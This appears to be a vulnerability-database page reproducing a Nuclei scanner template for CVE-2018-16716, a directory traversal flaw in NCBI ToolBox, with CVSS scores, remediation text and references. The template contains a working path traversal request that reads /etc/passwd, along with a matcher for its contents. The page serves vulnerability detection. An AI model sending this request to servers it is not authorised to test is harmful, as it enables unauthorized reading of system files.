Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-16716
HistoryFeb 28, 2022 - 1:42 p.m.

NCBI ToolBox - Directory Traversal

2022-02-2813:42:01
ProjectDiscovery
github.com
3

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

9.2 High

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

75.2%

NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.

id: CVE-2018-16716

info:
  name: NCBI ToolBox - Directory Traversal
  author: 0x_Akoko
  severity: critical
  description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
  impact: |
    An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox.
  reference:
    - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/grymer/CVE
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2018-16716
    cwe-id: CWE-22
    epss-score: 0.0045
    epss-percentile: 0.75058
    cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nih
    product: ncbi_toolbox
  tags: cve,cve2018,ncbi,lfi,nih

http:
  - method: GET
    path:
      - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b54f467183de3b3a31a23eff25fa6b7e31a40b596318042dd4a50afc2466987b02201e7898d41a785ccdb33f9ead77fbcab180c3bc0dca2a626981f431882fed4cb9:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

9.2 High

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

75.2%

Related for NUCLEI:CVE-2018-16716